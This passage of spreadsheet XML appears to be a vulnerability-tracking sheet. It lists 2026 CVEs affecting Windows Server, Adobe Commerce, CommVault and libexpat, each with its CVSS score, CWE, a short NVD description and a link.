t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1146" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1146" s="5" t="inlineStr"><is><t>CVE-2026-71330</t></is></c><c r="D1146" s="5" t="n"><v>7.5</v></c><c r="E1146" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1146" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1146" s="5" t="inlineStr" /><c r="H1146" s="5" t="n"><v>0.008</v></c><c r="I1146" s="5" t="inlineStr" /><c r="J1146" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K11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46" s="5" t="inlineStr" /><c r="M1146" s="5" t="inlineStr" /><c r="N1146" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1146" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1146" s="5" t="inlineStr" /><c r="Q1146" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="R1146" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1146" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t></is></c></row><row r="1147"><c r="A1147" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1147" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1147" s="5" t="inlineStr"><is><t>CVE-2026-72923</t></is></c><c r="D1147" s="5" t="n"><v>7.5</v></c><c r="E1147" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1147" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1147" s="5" t="inlineStr" /><c r="H1147" s="5" t="n"><v>0.012</v></c><c r="I1147" s="5" t="inlineStr" /><c r="J1147" s="5" t="inlineStr" /><c r="K1147" s="5" t="inlineStr" /><c r="L1147" s="5" t="inlineStr" /><c r="M1147" s="5" t="inlineStr" /><c r="N1147" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1147" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1147" s="5" t="inlineStr" /><c r="Q1147" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R1147" s="5" t="inlineStr"><is><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is></c><c r="S1147" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72923</t></is></c></row><row r="1148"><c r="A1148" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1148" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1148" s="5" t="inlineStr"><is><t>CVE-2026-72928</t></is></c><c r="D1148" s="5" t="n"><v>7.5</v></c><c r="E1148" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1148" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1148" s="5" t="inlineStr" /><c r="H1148" s="5" t="n"><v>0.006</v></c><c r="I1148" s="5" t="inlineStr" /><c r="J1148" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1148" s="5" t="inlineStr"><is><t>microsoft:windows_server_2025</t></is></c><c r="L1148" s="5" t="inlineStr" /><c r="M1148" s="5" t="inlineStr" /><c r="N1148" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1148" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1148" s="5" t="inlineStr" /><c r="Q1148" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1148" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t></is></c><c r="S1148" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t></is></c></row><row r="1149"><c r="A1149" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1149" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1149" s="5" t="inlineStr"><is><t>CVE-2026-72932</t></is></c><c r="D1149" s="5" t="n"><v>7.5</v></c><c r="E1149" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1149" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1149" s="5" t="inlineStr" /><c r="H1149" s="5" t="n"><v>0.01</v></c><c r="I1149" s="5" t="inlineStr" /><c r="J1149" s="5" t="inlineStr" /><c r="K1149" s="5" t="inlineStr" /><c r="L1149" s="5" t="inlineStr" /><c r="M1149" s="5" t="inlineStr" /><c r="N1149" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1149" s="5" t="inlineStr" /><c r="Q1149" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1149" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Message Queuing Queue Manager allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1149" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72932</t></is></c></row><row r="1150"><c r="A1150" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1150" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1150" s="5" t="inlineStr"><is><t>CVE-2026-72943</t></is></c><c r="D1150" s="5" t="n"><v>7.5</v></c><c r="E1150" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1150" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1150" s="5" t="inlineStr" /><c r="H1150" s="5" t="n"><v>0.006</v></c><c r="I1150" s="5" t="inlineStr" /><c r="J1150" s="5" t="inlineStr" /><c r="K1150" s="5" t="inlineStr" /><c r="L1150" s="5" t="inlineStr" /><c r="M1150" s="5" t="inlineStr" /><c r="N1150" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1150" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1150" s="5" t="inlineStr" /><c r="Q1150" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1150" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t></is></c><c r="S1150" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72943</t></is></c></row><row r="1151"><c r="A1151" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1151" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1151" s="5" t="inlineStr"><is><t>CVE-2026-72949</t></is></c><c r="D1151" s="5" t="n"><v>7.5</v></c><c r="E1151" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1151" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1151" s="5" t="inlineStr" /><c r="H1151" s="5" t="n"><v>0.011</v></c><c r="I1151" s="5" t="inlineStr" /><c r="J1151" s="5" t="inlineStr" /><c r="K1151" s="5" t="inlineStr" /><c r="L1151" s="5" t="inlineStr" /><c r="M1151" s="5" t="inlineStr" /><c r="N1151" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1151" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1151" s="5" t="inlineStr" /><c r="Q1151" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R1151" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows SMB Server Network Transport Driver (srvnet.sys) allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1151" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72949</t></is></c></row><row r="1152"><c r="A1152" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1152" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1152" s="5" t="inlineStr"><is><t>CVE-2026-72954</t></is></c><c r="D1152" s="5" t="n"><v>7.5</v></c><c r="E1152" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1152" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1152" s="5" t="inlineStr" /><c r="H1152" s="5" t="n"><v>0.006</v></c><c r="I1152" s="5" t="inlineStr" /><c r="J1152" s="5" t="inlineStr" /><c r="K1152" s="5" t="inlineStr" /><c r="L1152" s="5" t="inlineStr" /><c r="M1152" s="5" t="inlineStr" /><c r="N1152" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1152" s="5" t="inlineStr" /><c r="Q1152" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1152" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t></is></c><c r="S1152" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72954</t></is></c></row><row r="1153"><c r="A1153" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1153" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1153" s="5" t="inlineStr"><is><t>CVE-2026-72989</t></is></c><c r="D1153" s="5" t="n"><v>7.5</v></c><c r="E1153" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1153" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1153" s="5" t="inlineStr" /><c r="H1153" s="5" t="n"><v>0.008</v></c><c r="I1153" s="5" t="inlineStr" /><c r="J1153" s="5" t="inlineStr" /><c r="K1153" s="5" t="inlineStr" /><c r="L1153" s="5" t="inlineStr" /><c r="M1153" s="5" t="inlineStr" /><c r="N1153" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1153" s="5" t="inlineStr" /><c r="Q1153" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1153" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Failover Cluster allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1153" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72989</t></is></c></row><row r="1154"><c r="A1154" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1154" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1154" s="5" t="inlineStr"><is><t>CVE-2026-73017</t></is></c><c r="D1154" s="5" t="n"><v>7.5</v></c><c r="E1154" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1154" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1154" s="5" t="inlineStr" /><c r="H1154" s="5" t="n"><v>0.002</v></c><c r="I1154" s="5" t="inlineStr" /><c r="J1154" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1154"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154" s="5" t="inlineStr" /><c r="M1154" s="5" t="inlineStr" /><c r="N1154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1154" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1154" s="5" t="inlineStr" /><c r="Q1154" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1154" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t></is></c><c r="S1154" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t></is></c></row><row r="1155"><c r="A1155" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1155" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1155" s="5" t="inlineStr"><is><t>CVE-2026-75465</t></is></c><c r="D1155" s="5" t="n"><v>7.5</v></c><c r="E1155" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1155" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1155" s="5" t="inlineStr" /><c r="H1155" s="5" t="n"><v>0.005</v></c><c r="I1155" s="5" t="inlineStr" /><c r="J1155" s="5" t="inlineStr" /><c r="K1155" s="5" t="inlineStr" /><c r="L1155" s="5" t="inlineStr" /><c r="M1155" s="5" t="inlineStr" /><c r="N1155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1155" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P1155" s="5" t="inlineStr" /><c r="Q1155" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R1155" s="5" t="inlineStr"><is><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is></c><c r="S1155" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75465</t></is></c></row><row r="1156"><c r="A1156" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1156" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1156" s="5" t="inlineStr"><is><t>CVE-2026-75998</t></is></c><c r="D1156" s="5" t="n"><v>7.5</v></c><c r="E1156" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1156" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1156" s="5" t="inlineStr" /><c r="H1156" s="5" t="n"><v>0.006</v></c><c r="I1156" s="5" t="inlineStr" /><c r="J1156" s="5" t="inlineStr" /><c r="K1156" s="5" t="inlineStr" /><c r="L1156" s="5" t="inlineStr" /><c r="M1156" s="5" t="inlineStr" /><c r="N1156" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1156" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1156" s="5" t="inlineStr" /><c r="Q1156" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R1156" s="5" t="inlineStr"><is><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is></c><c r="S1156" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75998</t></is></c></row><row r="1157"><c r="A1157" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1157" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1157" s="5" t="inlineStr"><is><t>CVE-2026-76956</t></is></c><c r="D1157" s="5" t="n"><v>7.5</v></c><c r="E1157" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1157" s="5" t="inlineStr" /><c r="H1157" s="5" t="n"><v>0.003</v></c><c r="I1157" s="5" t="inlineStr" /><c r="J1157" s="5" t="inlineStr" /><c r="K1157" s="5" t="inlineStr"><is><t>libexpat_project:libexpat</t></is></c><c r="L1157" s="5" t="inlineStr" /><c r="M1157" s="5" t="inlineStr" /><c r="N1157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1157" s="5" t="inlineStr"><is><t>2026-08-20</t></is></c><c r="P1157" s="5" t="inlineStr" /><c r="Q1157" s="5" t="inlineStr"><is><t>CWE-394</t></is></c><c r="R1157" s="5" t="inlineStr"><is><t>In libexpat 2.8.2 and 2.8.3 before 2.8.4, misinterpretation of getentropy's return code leads to insufficient entropy, which results in being vulnerable to hash flooding attacks, causing a denial of service via crafted XML content.</t></is></c><c r="S1157" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76956</t></is></c></row><row r="1158"><c r="A1158" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1158" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1158" s="5" t="inlineStr"><is><t>CVE-2026-77101</t></is></c><c r="D1158" s="5" t="n"><v>7.5</v></c><c r="E1158" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1158" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1158" s="5" t="inlineStr" /><c r="H1158" s="5" t="n"><v>0.003</v></c><c r="I1158" s="5" t="inlineStr" /><c r="J1158" s="5" t="inlineStr" /><c r="K1158" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1158" s="5" t="inlineStr" /><c r="M1158" s="5" t="inlineStr" /><c r="N1158" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1158" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1158" s="5" t="inlineStr" /><c r="Q1158" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R1158" s="5" t="inlineStr"><is><t>CommServe contained a stack-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="S1158" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77101</t></is></c></row><row r="1159"><c r="A1159" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1159" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1159" s="5" t="inlineStr"><is><t>CVE-2026-77102</t></is></c><c r="D1159" s="5" t="n"><v>7.5</v></c><c r="E1159" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1159" s="5" t="inlineStr" /><c r="H1159" s="5" t="n"><v>0.003</v></c><c r="I1159" s="5" t="inlineStr" /><c r="J1159" s="5" t="inlineStr" /><c r="K1159" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1159" s="5" t="inlineStr" /><c r="M1159" s="5" t="inlineStr" /><c r="N1159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1159" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1159" s="5" t="inlineStr" /><c r="Q1159" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1159" s="5" t="inlineStr"><is><t>CommServe contained a heap-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="S1159" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77102</t></is></c></row><row r="1160"><c r="A1160" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1160" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1160" s="5" t="inlineStr"><is><t>CVE-2026-77103</t></is></c><c r="D1160" s="5" t="n"><v>7.5</v></c><c r="E1160" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1160" s="5" t="inlineStr" /><c r="H1160" s="5" t="n"><v>0.003</v></c><c r="I1160" s="5" t="inlineStr" /><c r="J1160" s="5" t="inlineStr" /><c r="K1160" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1160" s="5" t="inlineStr" /><c r="M1160" s="5" t="inlineStr" /><c r="N1160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1160" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1160" s="5" t="inlineStr" /><c r="Q1160" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="R1160" s="5" t="inlineStr"><is><t>CommServe contained an authentication bypass issue affecting access authorization and information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="S1160" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77103</t></is></c></row><row r="1161"><c r="A1161" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1161" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1161" s="5" t="inlineStr"><is><t>CVE-2026-77104</t></is></c><c r="D1161" s="5" t="n"><v>7.5</v></c><c r="E1161" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1161" s="5" t="inlineStr" /><c r="H1161" s="5" t="n"><v>0.004</v></c><c r="I1161" s="5" t="inlineStr" /><c r="J1161" s="5" t="inlineStr" /><c r="K1161" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1161" s="5" t="inlineStr" /><c r="M1161" s="5" t="inlineStr" /><c r="N1161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1161" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1161" s="5" t="inlineStr" /><c r="Q1161" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1161" s="5" t="inlineStr"><is><t>CommServe contained a path traversal issue affecting information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="S1161" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77104</t></is></c></row><row r="1162"><c r="A1162" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1162" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1162" s="5" t="inlineStr"><is><t>CVE-2026-77108</t></is></c><c r="D1162" s="5" t="n"><v>7.5</v></c><c r="E1162" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1162" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1162" s="5" t="inlineStr" /><c r="H1162" s="5" t="n"><v>0.005</v></c><c r="I1162" s="5" t="inlineStr" /><c r="J1162" s="5" t="inlineStr" /><c r="K1162" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L1162" s="5" t="inlineStr" /><c r="M1162" s="5" t="inlineStr" /><c r="N1162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1162" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1162" s="5" t="inlineStr" /><c r="Q1162" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1162" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to sensitive information. Exploitation of this issue does not require user interaction.</t></is></c><c r="S1162" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77108</t></is></c></row><row r="1163"><c r="A1163" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1163" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1163" s="5" t="inlineStr"><is><t>CVE-2026-77124</t></is></c><c r="D1163" s="5" t="n"><v>7.5</v></c><c r="E1163" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1163" s="5" t="inlineStr"><is><t>103e4ec9-0a87-450b-af77-479448ddef11</t></is></c><c r="G1163" s="5" t="inlineStr" /><c r="H1163" s="5" t="n"><v>0.003</v></c><c r="I1163" s="5" t="inlineStr" /><c r="J1163" s="5" t="inlineStr" /><c r="K1163" s="5" t="inlineStr" /><c r="L1163" s="5" t="inlineStr" /><c r="M1163" s="5" t="inlineStr" /><c r="N1163" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1163" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P1163" s="5" t="inlineStr" /><c r="Q1163" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="R1163" s="5" t="inlineStr"><is><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is></c><c r="S1163" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77124</t></is></c></row><row r="1164"><c r="A1164" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1164" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1164" s="5" t="inlineStr"><is><t>CVE-2026-77494</t></is></c><c r="D1164" s="5" t="n"><v>7.5</v></c><c r="E1164" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1164" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1164" s="5" t="inlineStr" /><c r="H1164" s="5" t="n"><v>0.012</v></c><c r="I1164" s="5" t="inlineStr" /><c r="J1164" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1164" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1164" s="5" t="inlineStr" /><c r="M1164" s="5" t="inlineStr" /><c r="N1164" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1164" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1164" s="5" t="inlineStr" /><c r="Q1164" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="R1164" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1164" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t></is></c></row><row r="1165"><c r="A1165" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1165" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1165" s="5" t="inlineStr"><is><t>CVE-2026-77498</t></is></c><c r="D1165" s="5" t="n"><v>7.5</v></c><c r="E1165" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1165" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1165" s="5" t="inlineStr" /><c r="H1165" s="5" t="n"><v>0.008</v></c><c r="I1165" s="5" t="inlineStr" /><c r="J1165" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1165" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1165" s="5" t="inlineStr" /><c r="M1165" s="5" t="inlineStr" /><c r="N1165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1165" s="5" t="inlineStr" /><c r="Q1165" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1165" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1165" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t></is></c></row><row r="1166"><c r="A1166" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1166" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1166" s="5" t="inlineStr"><is><t>CVE-2026-77499</t></is></c><c r="D1166" s="5" t="n"><v>7.5</v></c><c r="E1166" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1166" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1166" s="5" t="inlineStr" /><c r="H1166" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1166" s="5" t="inlineStr" /><c r="J1166" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1166" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1166" s="5" t="inlineStr" /><c r="M1166" s="5" t="inlineStr" /><c r="N1166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1166" s="5" t="inlineStr" /><c r="Q1166" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="R1166" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1166" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t></is></c></row><row r="1167"><c r="A1167" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1167" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1167" s="5" t="inlineStr"><is><t>CVE-2026-77501</t></is></c><c r="D1167" s="5" t="n"><v>7.5</v></c><c r="E1167" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1167" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1167" s="5" t="inlineStr" /><c r="H1167" s="5" t="n"><v>0.008</v></c><c r="I1167" s="5" t="inlineStr" /><c r="J1167" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1167" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1167" s="5" t="inlineStr" /><c r="M1167" s="5" t="inlineStr" /><c r="N1167" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1167" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1167" s="5" t="inlineStr" /><c r="Q1167" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1167" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1167" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t></is></c></row><row r="1168"><c r="A1168" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1168" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1168" s="5" t="inlineStr"><is><t>CVE-2026-77502</t></is></c><c r="D1168" s="5" t="n"><v>7.5</v></c><c r="E1168" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1168" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1168" s="5" t="inlineStr" /><c r="H1168" s="5" t="n"><v>0.008</v></c><c r="I1168" s="5" t="inlineStr" /><c r="J1168" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1168" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, 